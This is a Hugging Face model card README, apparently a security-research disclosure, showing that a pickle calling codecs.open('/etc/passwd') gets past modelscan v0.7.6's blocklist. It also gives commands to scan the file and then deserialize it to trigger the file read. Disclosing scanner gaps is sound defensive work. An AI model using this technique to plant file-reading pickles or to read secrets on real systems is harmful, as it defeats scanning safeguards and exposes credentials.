Hugging Face's logo

manja316
/
modelscan-bypass-codecs-fileread

security-research
modelscan-bypass
Model card Files
xet
 Community
modelscan-bypass-codecs-fileread / README.md
manja316's picture
manja316
Add README
17e5002 verified
preview code
|
raw
history blame contribute delete
584 Bytes
---
license: mit
tags:
- security-research
- modelscan-bypass
---
# modelscan-bypass-codecs-fileread
## Impact
HIGH - Read arbitrary files (secrets, keys, config)
## Technique
codecs.open('/etc/passwd', 'r') - codecs not in blocklist
## Verification
```bash
# Scan with modelscan - should show "No issues found"
modelscan scan -p model.pkl
# Execute to verify malicious behavior
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
```
## Details
Modelscan bypass via codecs.open - Arbitrary file read
Tested against modelscan v0.7.6 (latest PyPI release).